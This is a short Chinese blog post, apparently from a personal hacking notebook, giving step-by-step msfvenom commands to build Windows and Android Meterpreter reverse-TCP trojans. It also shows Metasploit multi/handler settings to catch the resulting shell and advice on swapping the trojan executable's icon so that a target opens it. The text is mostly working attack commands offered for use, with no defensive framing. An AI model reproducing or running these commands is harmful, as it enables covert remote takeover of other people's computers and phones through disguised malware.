简单的反弹shell
2019-09-25 本文已影响0人
草莓养殖户
0x01
msf生成木马exe,靶机打开中招。
1、msf生成木马exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.132 LPORT=1234 -f exe -o shell.exe
发送到目标机器。
扩展:msf可以生成很多木马,手机的也可以。比如安卓的
msfvenom -p android/meterpreter/reverse_tcp LHOST=X LPORT=X > aaa.apk ,接下来的就都一样了
2、打开msf控制台
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
设置变量跟生成木马的 IP 和 端口一致。
payload3、run或者exploit
4、靶机上打开shell.exe,即可接收到shell
拿到shell后,可能有乱码。 输入 chcp 65001 可以解决。
今天2019/26,今天找到了更换exe文件图标的办法,需要两个工具 IrfanView(1)将图片转换成ICO文件的工具。(2)将exe图标更换的工具 qiconchanger。主要还是qiconchanger工具。ICO文件从网上找或者从应用文档里找,或者用IrfanView 这个软件做一个。
直接把木马exe拖到这个框框里,再把ICO文件拖过来就行了。但是需要exe和ICO在一个文档里才能显示出想要的效果。
呐!!下面是我做的
0x02
nc
参考网站:https://www.jianshu.com/p/c1ffb563db4e